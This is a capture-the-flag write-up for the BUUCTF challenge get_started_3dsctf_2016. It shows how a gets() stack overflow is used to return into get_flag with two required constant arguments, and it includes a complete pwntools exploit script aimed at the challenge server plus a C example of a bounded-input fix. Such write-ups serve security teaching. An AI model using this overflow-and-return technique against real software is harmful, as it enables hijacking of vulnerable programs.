BUUCTF-PWN-get_started_3dsctf_2016

checksec


IDA


The program reads input with gets(), which has no length check, so the stack buffer can be overflowed.


The padding needed to reach the saved return address is 0x38 bytes.
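As an added example (not code from the writeup or from the challenge binary), the root cause beside its fix: the unbounded read pattern that gets() represents, and a bounded replacement that stores at most cap - 1 bytes, always NUL-terminates, and reports when a line was longer than the buffer so the caller can reject it. The buffer size 56 (0x38) mirrors the padding length measured above; the function names and the in-memory stream helper are assumptions chosen for illustration.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() */
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

#define NAME_BUF 56  /* 0x38 bytes: the distance to the return address found in the writeup */

/* Vulnerable pattern (reference only, compiled out): gets() does not know how large
 * buf is, so any line longer than NAME_BUF - 1 bytes keeps writing past the buffer
 * into the saved frame pointer and the return address. */
#if 0
void read_name_unsafe(void) {
    char buf[NAME_BUF];
    gets(buf);
}
#endif

/* Bounded replacement: reads one line from `in` into dst, storing at most cap - 1
 * bytes plus a terminating NUL. The trailing newline is stripped (as gets() does).
 * If the line did not fit, the remainder is drained up to the newline and
 * *truncated is set, so the caller can treat the oversized input as an error
 * instead of silently processing a cut line. Returns bytes stored, or -1 on EOF. */
long read_line_bounded(char *dst, size_t cap, FILE *in, bool *truncated) {
    *truncated = false;
    if (cap == 0 || fgets(dst, (int)cap, in) == NULL)
        return -1;
    size_t n = strlen(dst);
    if (n > 0 && dst[n - 1] == '\n') {
        dst[--n] = '\0';
    } else {
        /* No newline stored: either the line was exactly cap - 1 bytes, input ended,
         * or the line was longer. Only extra bytes before the newline mean truncation. */
        int c;
        while ((c = fgetc(in)) != EOF && c != '\n')
            *truncated = true;
    }
    return (long)n;
}

/* Helper (assumed, for checking without a terminal): treats `text` as the
 * constructed contents of stdin and runs the bounded reader over it. */
static long run_on_text(const char *text, size_t cap, bool *truncated) {
    char dst[256];
    if (cap > sizeof dst) cap = sizeof dst;
    FILE *in = fmemopen((void *)text, strlen(text), "r");
    if (in == NULL) return -1;
    long n = read_line_bounded(dst, cap, in, truncated);
    fclose(in);
    return n;
}

long stored_length(const char *text, size_t cap) {
    bool t;
    return run_on_text(text, cap, &t);
}

bool line_was_truncated(const char *text, size_t cap) {
    bool t;
    run_on_text(text, cap, &t);
    return t;
}

int main(void) {
    char buf[NAME_BUF];
    bool truncated;
    printf("name: ");
    long n = read_line_bounded(buf, sizeof buf, stdin, &truncated);
    if (n < 0) return 1;
    if (truncated) {
        fprintf(stderr, "input longer than %d bytes rejected\n", NAME_BUF - 1);
        return 1;
    }
    printf("stored %ld bytes: %s\n", n, buf);
    return 0;
}
```

Feeding it a line of 100 'A's stores 55 bytes and reports truncation, whereas the gets() version would have written all 100 bytes and 0x38 of them would already cover the saved return address. The drain loop matters: without it, the unread tail of an oversized line would be consumed by the next read.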

The binary also contains a function get_flag.


Its body is guarded by an if statement on its two arguments, which has to be satisfied; since this is a 32-bit binary, the arguments can be supplied on the stack right after the return address when we return into get_flag.

get_flag_addr


The two constants the if statement compares against, a1 and a2, are read straight from the disassembly.


Also locate the address of exit; it is used later as get_flag's return address.


EXP

from pwn import *

p = remote('node4.buuoj.cn', 27976)

# Addresses and constants taken from the binary in IDA
get_flag_addr = 0x080489a0   # get_flag(a1, a2)
exit_addr = 0x0804E6A0       # exit(), placed as get_flag's return address
a1 = 0x308CD64F              # first value the if statement in get_flag expects
a2 = 0x195719D1              # second value it expects

# 0x38 bytes of padding reach the saved return address. Under the 32-bit cdecl
# convention the word after the function address is its return address, and the
# words after that are its arguments.
payload = b'a' * 0x38 + p32(get_flag_addr) + p32(exit_addr) + p32(a1) + p32(a2)

p.sendline(payload)
p.interactive()

Result

(screenshot of the remote session omitted)